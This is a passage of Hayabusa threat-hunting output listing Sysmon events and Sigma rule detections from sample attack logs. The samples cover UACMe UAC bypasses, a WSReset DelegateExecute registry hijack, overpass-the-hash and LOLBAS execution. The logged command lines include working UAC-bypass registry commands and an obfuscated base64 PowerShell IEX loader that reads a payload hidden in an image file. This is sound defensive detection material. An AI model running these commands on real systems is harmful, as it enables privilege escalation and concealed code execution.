+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:35.402 +09:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,../hayabusa-rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:10:35.454 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx 2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:57.582 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:57.800 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.127 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.713 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.714 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:58.774 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:33:59.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:34:00.871 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 18:34:01.014 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx 2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:29.676 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.175 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: (Empty) | Process: C:\Windows\system32\reg.exe | PID: 1768 | PGUID: 747F3D96-B07F-5D46-0000-001031A90F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.476 +09:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,../hayabusa-rules/sigma/registry_event/win_re_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.609 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2444 | PGUID: 747F3D96-B07F-5D46-0000-0010F1B20F04,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:31.949 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3fb | PID: 200 | PGUID: 747F3D96-B07F-5D46-0000-001050C80F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:32.001 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 312 000002806444CB40 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3952 | PGUID: 747F3D96-B07F-5D46-0000-0010C1CB0F04,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WSReset.exe"" | Process: C:\Windows\System32\WSReset.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 56 | LID: 0x18d3b3 | PID: 2112 | PGUID: 747F3D96-B080-5D46-0000-0010D4EA0F04",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:32.438 +09:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass WSReset,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_bypass_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WSReset.exe"" | LID: 0x18d3b3 | PID: 820 | PGUID: 747F3D96-B091-5D46-0000-001081F71104",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc | Evas,Wsreset UAC Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wsreset_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:50.009 +09:00,MSEDGEWIN10,1,high,PrivEsc,Bypass UAC via WSReset.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_wsreset.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:50.455 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c start C:\Windows\system32\cmd.exe | LID: 0x18d3b3 | PID: 7792 | PGUID: 747F3D96-B092-5D46-0000-001089041204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.299 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.441 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default): C:\Windows\system32\cmd.exe /c start C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 1960 | PGUID: 747F3D96-B097-5D46-0000-0010E1321204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.446 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d ""{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.643 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-56 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute: {4ED3A719-CEA8-4BD9-910D-E252F997AFC2} | Process: C:\Windows\system32\reg.exe | PID: 3444 | PGUID: 747F3D96-B097-5D46-0000-0010E7381204,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-04 19:16:55.712 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx 2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: - | IP Addr: ::1 | LID: 0x38f87e | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx 2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx 2019-08-05 18:39:30.697 +09:00,MSEDGEWIN10,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Invoke_TokenDuplication_UAC_Bypass4624.evtx 2019-08-14 20:53:29.688 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\explorer.exe"" shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 1052 | PGUID: 747F3D96-F639-5D53-0000-001067DA2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.010 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x29126 | PID: 6000 | PGUID: 747F3D96-F639-5D53-0000-001092EE2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0x29126 | PID: 8180 | PGUID: 747F3D96-F639-5D53-0000-0010B0FC2600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 20:53:30.022 +09:00,MSEDGEWIN10,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec.evtx 2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x29126 | PID: 2476 | PGUID: 747F3D96-FBCA-5D53-0000-0010B8664100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.614 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\wscript.exe"" /E:vbs c:\windows\temp\icon.ico ""powershell -exec bypass -c """"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFhYPUlFWCgoJ1snICsgW2NoYXJdMHg1MyArICd5c3RlbS5UZXh0LkVuYycgKyBbY2hhcl0weDZmICsgJ2RpbmddOjpBJyArIFtjaGFyXTB4NTMgKyAnQ0lJLkdldCcgKyBbY2hhcl0weDUzICsgJ3RyaW5nKFsnICsgW2NoYXJdMHg1MyArICd5c3RlbS5DJyArIFtjaGFyXTB4NmYgKyAnbnZlcnRdOjpGcicgKyBbY2hhcl0weDZmICsgJ21CYXNlNicgKyBbY2hhcl0weDM0ICsgJycgKyBbY2hhcl0weDUzICsgJ3RyaW5nKChnZXQtYycgKyBbY2hhcl0weDZmICsgJ250ZW50IC1wYXRoICcnYzpcd2luZCcgKyBbY2hhcl0weDZmICsgJ3dzXHRlbXBccGljdHVyZS5qcGcnJykpKScpKTskQkI9SUVYKCgnc3RhcnQtc2xlZXAgMTA7JHM9JFhYOyRkID0gQCgpOyR2ID0gMDskYyA9IDA7d2hpbGUoJGMgLW5lICRzLmxlbmd0aCl7JHY9KCR2KjUyKSsoW0ludDMyXVtjaGFyXSRzWyRjXS0nICsgW2NoYXJdMHgzNCArICcwKTtpZigoKCRjKzEpJTMpIC1lcSAwKXt3aGlsZSgkdiAtbmUgMCl7JHZ2PSR2JTI1NjtpZigkdnYgLWd0IDApeyRkKz1bY2hhcl1bSW50MzJdJHZ2fSR2PVtJbnQzMl0oJHYvMjU2KX19JGMrPTE7fTtbYXJyYXldOjpSZXZlcnNlKCRkKTtJRVgoWycgKyBbY2hhcl0weDUzICsgJ3RyaW5nXTo6SicgKyBbY2hhcl0weDZmICsgJ2luKCcnJycsJGQpKTs7JykpO0lFWCgkQkIp')))"""""" | Process: C:\Windows\System32\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} | LID: 0x29126 | PID: 2876 | PGUID: 747F3D96-FBCA-5D53-0000-001036784100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Evas,FromBase64String Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx 2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp 